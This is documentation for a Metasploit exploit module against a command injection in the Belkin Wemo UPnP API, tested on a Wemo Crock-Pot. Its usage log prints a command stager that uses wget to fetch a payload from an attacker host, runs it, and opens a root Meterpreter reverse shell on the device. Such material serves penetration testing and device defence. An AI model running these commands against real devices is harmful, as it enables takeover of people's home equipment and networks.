## Introduction This module exploits a command injection in the Belkin Wemo UPnP API via the `SmartDevURL` argument to the `SetSmartDevInfo` action. This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo devices are known to be affected, albeit on a different `RPORT` (49153). ## Setup You may buy the device on Amazon at . ## Targets ``` Id Name -- ---- 0 Unix In-Memory 1 Linux Dropper ``` ## Options **RPORT** Set this to the Wemo device's UPnP port. In our testing, this was 49152 for Crock-Pot and 49153 for other devices. ## Usage ``` msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run [*] Started reverse TCP handler on 10.22.22.4:4444 [+] Wemo-enabled device detected [*] Found firmware version: 2.00.6461 [+] Firmware version 2.00.6461 < 2.00.8643 [*] 10.22.22.1:49152 - The target appears to be vulnerable. [*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6 [*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6 [*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"] [*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P [*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6 [*] Sending payload to 10.22.22.1 (Wget) [*] Transmitting intermediate stager...(164 bytes) [*] Sending stage (1252312 bytes) to 10.22.22.1 [*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600 [*] Server stopped. meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > sysinfo Computer : 10.22.22.1 OS : (Linux 2.6.21) Architecture : mips BuildTuple : mipsel-linux-muslsf Meterpreter : mipsle/linux meterpreter > ```